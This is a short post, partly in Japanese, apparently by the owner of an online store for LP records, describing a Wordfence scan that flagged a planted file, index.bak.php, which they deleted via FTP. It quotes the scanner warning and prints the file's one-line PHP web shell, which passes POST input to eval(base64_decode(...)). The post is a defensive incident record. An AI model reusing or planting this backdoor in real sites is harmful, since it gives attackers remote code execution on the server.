• Satellite Store for LP Records and Digital Items

    Wordfence をインストール。スキャンでの不正ファイルを発見。これをFTPで削除。

    This file may contain malicious executable code

    Filename: index.bak.php
    File type: Not a core, theme or plugin file.
    Issue first detected: 33 mins ago.
    Severity: Critical
    Status New

    This file is a PHP executable file and contains an eval() function and base64() decoding function on the same line. This is a common technique used by hackers to hide and execute code. If you know about this file you can choose to ignore it to exclude it from future scans.

    index.bak.php が作成され、次の一行が書かれていた。

    <?php ($_=$_POST).($_1=’_’).($_4=$$_1).($_4=$_4[$_1]).($_4($$_1)).eval(base64_decode($_4($$_1)));?>

    .htaccess には改ざんされた様子はない。偽装ファイルも無いようで、恐らく3つのサイトを入れ替えながら更新している過程で改ざんされたと思われる。